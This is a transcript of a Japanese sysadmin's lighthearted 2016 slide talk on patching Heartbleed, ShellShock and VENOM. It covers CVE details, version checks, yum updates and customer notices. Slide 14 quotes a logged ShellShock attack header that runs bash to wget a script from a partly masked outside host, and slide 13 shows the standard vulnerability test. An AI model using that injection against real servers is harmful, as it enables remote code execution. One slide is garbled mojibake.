クッソ忙しい我々を襲う脆弱性たち

Transcript

1. クッソ忙しい
 我々を襲う脆弱性たち 東海道眺める横浜の夏 2016
 靴ひも伍長 @_EOF_83_EOF_

2. $ whois • ▪生まれも育ちも横浜のはまっ子()
 - 仕事でさっぽろぐらし！経験あり • ▪ロボアニメが大好きなオタク
 - たけのこ派

   • ▪都内でさばかん！しています
 - 気がついたら4年目突入してた • ▪PCとサーバは私が嫁
 - リモート出来ない子は知らない子です • ▪特技はお客様サイトのドメインを覚えること
 - 誰にも披露できない特技なので特技と言えない
 ※サーバの管理名は覚えられない…つらい※ 普段はこんなアイコンで
 過ごしてる

3. $ 近況 • ▪夏合宿に参加した
 - もくもく会のはずが、
 ほぼ千葉旅行だった！楽しかった
 - 気がつけば山登りしていた
 ▪大好きなアニメの映画を2回見に行った


   - 見に行ってよかった…(´；ω；｀)
 - 午後休もらったら上司に心配された

4. $ あじぇんだ ・近年の脆弱性3種の概要などをゆるふわに
 - Heartbleed (OpenSSL) - ShellShock (Bash) -

   VENOM (QEMU)
 ・脆弱性情報の入手と対応方法の調べ方 ・まとめ

5. ・脆弱性の対応って
 めっちゃ辛くありませんか…？
 というか忙しい時に限ってやべぇ脆弱性が報告される気がする… ・お客様から対応したの？
 って連絡頂くこともあるし、、、 $ 脆弱性対応していますか？

6. ʊਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓਓʊ ʼɹ(੬ऑੑରԠͱ)ઓΘͳ͚Ε͹ੜ͖࢒Εͳ͍ʂʂɹ ʻ ʉY^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Yʉ

7. Heartbleed

8. ・いつ頃見つかった？
 - 2014年4月頃
 ・CVE番号(脆弱性につける番号)
 - CVE-2014-0160
 ・対象バージョン
 - OpenSSL 1.0.1

   から 1.0.1f - OpenSSL 1.0.2-beta から 1.0.2-beta1
 ・どんな脆弱性？
 - Heartbeat機能に起因する脆弱性として広まった。
 悪用されると、メモリを第三者に見られ
 重要な情報が漏れてしまうコワイ！
 ・まつわる思い出
 - はじめて対応した脆弱性、
 - 脆弱性の対応方法を覚えるきっかけになった
 あとssllabsを知るきっかけになり、もう一生離れられないと悟る Heartbleed(心臓出血)

9. ・テスト環境の用意 - テスト環境を用意しオレオレSSL証明書を設置、
 ssllabsにて確認 ・OpenSSLのバージョン確認とバージョンアップ方法を確認 # openssl version # yum

   install yum-changelog # yum --changelog update openssl : Updating: openssl x86_64 *1.0.1e-16.el6_5.14* updates 1.5 M Updating for dependencies: openssl-devel x86_64 1.0.1e-16.el6_5.14 updates 1.2 M Upgrade 2 Package(s) Is this ok [y/N]: y [Enter] # openssl version 対応方法1/2

10. ・ssllabsで再確認 - Heartbleedの問題を解決できたことを確認した ・手順の作成 - 検証した内容を基に更新の手順を作成した ・対象サーバの確認/OpenSSLのバージョンを確認 - なぜか対象サーバのリストがなかったので
 Excelにホスト名・OS、


    OpenSSLのバージョンなどを書いた。
 ・OpenSSLを手動で更新 - 手順を基にひたすら更新をかけまくった - 更新が終わったらExcelに書くという感じで
 対応した記憶が…。 ・Redmineに記録を残し作業完了 対応方法2/2

11. ShellShock

12. ・いつ頃見つかった？
 - 2014年9月頃
 ・CVE番号(脆弱性につける番号)
 - CVE-2014-6271、CVE-2014-7169
 ・対象バージョン
 - bash 4.3

    25、bash 4.2 48 およびそれ以前他多数
 ・どんな脆弱性？
 - CGI経由でBashを実行するアプリがあると、
 リモートでOSコマンドが実行される可能性が…
 ・まつわる思い出
 - 影響が広範囲すぎて対応が大変だった - はじめのパッチに問題があり
 2回アップデートすることに ShellShock

13. パッチ適用前
 
 [kutsuhimo@hogehoge ~]$ env x='() { :;}; echo vulnerable'

    bash -c "echo this is a test" vulnerable ## あわわわわ this is a test [kutsuhimo@hogehoge ~]$ パッチ適用後 [kutsuhimo@hogehoge ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" this is a test [kutsuhimo@hogehoge ~]$ 実験コード

14. **.**.**.** - - [09/Sep/2014:00:00:00 +0900] "GET / HTTP/1.1" 401 11111

    "-" "() { :;}; /bin/ bash -c \"wget http://**.**.**.**/bash- count.sh\""
 
 Bash起動してなんかDLさせようとする奴〜〜ww
 ※一部隠してます 攻撃例

15. ・テスト環境でアップデート適用
 - # yum update bash ・そもそも深刻度10とかヤバイ
 ・全サーバでアップデート適用 対応方法

16. VENOM

17. お前これがやりたかっただけだろ
 シリーズ

18. ・いつ頃見つかった？
 - 2015年5月頃
 ・CVE番号(脆弱性につける番号)
 - CVE-2015-3456
 ・対象バージョン
 - Xen 4.5.x、Xen

    4.4.x、Xen 4.3.x、Xen 4.2.x
 - VirtualBox, qemu-kvmなど 範囲ヤバイ
 ・どんな脆弱性？
 - QEMU(フロッピー)の脆弱性、
 ゲストがホストにいたずらできる
 ・まつわる思い出
 - はじめての徹夜&夜間作業(白目)
 - お客様にめっちゃメール送信(再起動伴うため) VENOM 可愛い女の子だと思った？俺だよ！！

19. ・コントロールパネルに再起動を促す表示
 - 表示のあるサーバたちをリスト化
 ・テスト環境の再起動
 - コントロールパネルから停止-> 起動 - 表示が消えたことを確認
 ・お客様にメール


    - 深夜に再起動するねごめんねメールを大量送信
 ・本番環境の再起動
 - コントロールパネルから停止-> 起動
 ・お客様にメール
 - 終わったよごめんねメールを大量送信 対応方法

20. ・脆弱性チェックを日課にしていきたい…
 - FeedlyなどでJVNをクロール
 - 仕事に飽きたとき情報サイトをながめる - 深刻度が高い時は人海戦術
 - クラウド等の場合はサイトを確認
 ・CVE番号を確認

    ・JVEの情報をみる ・脆弱性の名前でググる - OpenSSL 脆弱性 2016 - Heartbleed 脆弱性 対応 など $ 対応方法について 1/2

21. ・対処方法を発見次第テスト環境で検証 - OpenSSLの場合SSL/TLSを有効に ・問題なければ本番たちに適用していく - すごいSSH(Ansibleなど)で適用 - システム部を道連れにする - 時間がかかる場合は日にちを分ける


    - 簡単な操作ならTerminalの
 同時送信機能とかをつかっちゃう $ 対応方法について 2/2

22. ・脆弱性対応はつらいけどやらないと… ・いつやるかの判断は深刻度を目安に
 ・新しい脆弱性が見つかったら情報を収集
 - JVN, 企業ブログなど ・常にテスト環境を利用できるように…
 - 特にOpenSSLは
 環境を用意するの面倒くさいし…


    ・本番への適用
 - 何が嫌ってこれですよね
 影響でないか不安の場合は
 テスト環境で徹底的に検証！ $ まとめ

23. おしまい☆
 ご清聴ありがとウサギ